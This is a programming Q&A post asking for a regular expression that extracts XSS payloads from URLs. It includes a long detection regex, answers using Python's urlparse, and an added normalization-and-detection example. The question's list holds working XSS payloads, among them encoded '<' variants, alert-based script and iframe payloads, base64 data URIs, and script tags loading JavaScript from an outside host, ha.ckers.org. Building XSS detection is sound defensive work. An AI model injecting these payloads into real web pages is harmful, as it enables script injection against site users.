Regular expression to match all the XSS payloads in the following list

Time: 2017-09-26 15:47:22

Tags: python regex python-2.7 payload

I need a regular expression that matches all the XSS payloads in the following list (I am not trying to filter XSS requests and save the URL as safe; I am trying to strip the payload out of the URL itself and save it to a variable for later use):

http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24&lt
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&LT
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#60
http://www.example.com/subcat.php?id=24&#060
http://www.example.com/subcat.php?id=24&#0060
http://www.example.com/subcat.php?id=24&#00060
http://www.example.com/subcat.php?id=24&#000060
http://www.example.com/subcat.php?id=24&#0000060
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3c
http://www.example.com/subcat.php?id=24&#x03c
http://www.example.com/subcat.php?id=24&#x003c
http://www.example.com/subcat.php?id=24&#x0003c
http://www.example.com/subcat.php?id=24&#x00003c
http://www.example.com/subcat.php?id=24&#x000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3c
http://www.example.com/subcat.php?id=24&#X03c
http://www.example.com/subcat.php?id=24&#X003c
http://www.example.com/subcat.php?id=24&#X0003c
http://www.example.com/subcat.php?id=24&#X00003c
http://www.example.com/subcat.php?id=24&#X000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3C
http://www.example.com/subcat.php?id=24&#x03C
http://www.example.com/subcat.php?id=24&#x003C
http://www.example.com/subcat.php?id=24&#x0003C
http://www.example.com/subcat.php?id=24&#x00003C
http://www.example.com/subcat.php?id=24&#x000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3C
http://www.example.com/subcat.php?id=24&#X03C
http://www.example.com/subcat.php?id=24&#X003C
http://www.example.com/subcat.php?id=24&#X0003C
http://www.example.com/subcat.php?id=24&#X00003C
http://www.example.com/subcat.php?id=24&#X000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)

I did manage to find one and edit it so that it matches some of them, but not all:

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

For an example, see here; it only matches <script>, and some of the payloads do not match it completely. Does anyone have a better regex that matches only the XSS payload of the URL, or a better way to find XSS payloads? Thanks in advance.

1 answer:

Answer 0: (score: 0)

Found a way using the built-in library:

import urlparse  # Python 2.7 module (urllib.parse in Python 3)

def find_xss_script(url, query=4):
    # urlparse returns a 6-tuple: scheme, netloc, path, params, query, fragment;
    # index 4 is the query component, i.e. everything after the '?'.
    data = urlparse.urlparse(url)
    return data[query]

Will return something like: id=24&#x000003c;
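An added example, written for this page rather than taken from the question or the answer, in Python 3. It takes the query component the way the answer does, then decodes the escape forms that appear in the question's list (percent-encoding, named, decimal and hexadecimal entities with or without a trailing ';' and with leading zeros, and \x / \u escapes) into one canonical string before looking for a payload marker. Normalising first is what makes a short pattern sufficient where the long regex above has to enumerate every spelling. The function names normalize, query_of, canonical_query and looks_like_xss, the marker list and the sample URLs are my own choices. One detail worth checking against the answer: numeric entities such as &#x3c contain a '#', which urlparse treats as the start of a URL fragment unless it is called with allow_fragments=False, so without that flag the query is cut off at the entity.

```python
import html
import re
from urllib.parse import urlparse, unquote

# JavaScript-style escapes as they appear in the question's list: \x3c, \u003C.
_JS_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')


def _decode_js_escapes(text):
    """Replace \\xNN and \\uNNNN sequences with the characters they denote."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def normalize(text, max_rounds=5):
    """Undo percent-encoding, HTML entities and JS escapes until the string
    stops changing (bounded), so nested encodings such as %26%23x3c collapse
    too. html.unescape handles &lt, &LT, &#60, &#0000060, &#x3c, &#X000003C
    with or without ';', which covers every entity form in the question."""
    for _ in range(max_rounds):
        decoded = _decode_js_escapes(html.unescape(unquote(text)))
        if decoded == text:
            break
        text = decoded
    return text


def query_of(url):
    """Query component, as in the answer, but with allow_fragments=False so the
    '#' inside numeric entities does not start a fragment and truncate it."""
    return urlparse(url, allow_fragments=False).query


def canonical_query(url):
    """The normalized query string: the text a detection regex should run on."""
    return normalize(query_of(url))


# Markers that survive normalization; a tag opener or a script-carrying URL scheme.
_MARKER = re.compile(r'<|javascript\s*:|data\s*:', re.IGNORECASE)


def looks_like_xss(url):
    """True when the canonical query contains one of the markers above."""
    return bool(_MARKER.search(canonical_query(url)))


# Constructed sample inputs mirroring the encodings in the question's list.
SAMPLES = [
    "http://www.example.com/subcat.php?id=24",                 # benign
    "http://www.example.com/subcat.php?id=24%3C",
    "http://www.example.com/subcat.php?id=24&#x000003c",
    "http://www.example.com/subcat.php?id=24&#0000060",
    "http://www.example.com/subcat.php?id=24&LT",
    "http://www.example.com/subcat.php?id=24\\u003C",
    "http://www.example.com/subcat.php?id=24%26%23x3c",         # double-encoded
    "http://www.example.com/subcat.php?id=24javascript:alert(1)",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(looks_like_xss(sample), repr(canonical_query(sample)))
```

Because the payloads in the question rely on '&' being part of the value, the whole query string is decoded at once; a legitimate parameter whose name happens to be an entity name (for example `...&lt=2` or `...&copy=1`) would be decoded as well, so in a real filter apply the normalization per parameter value after the framework has split the query.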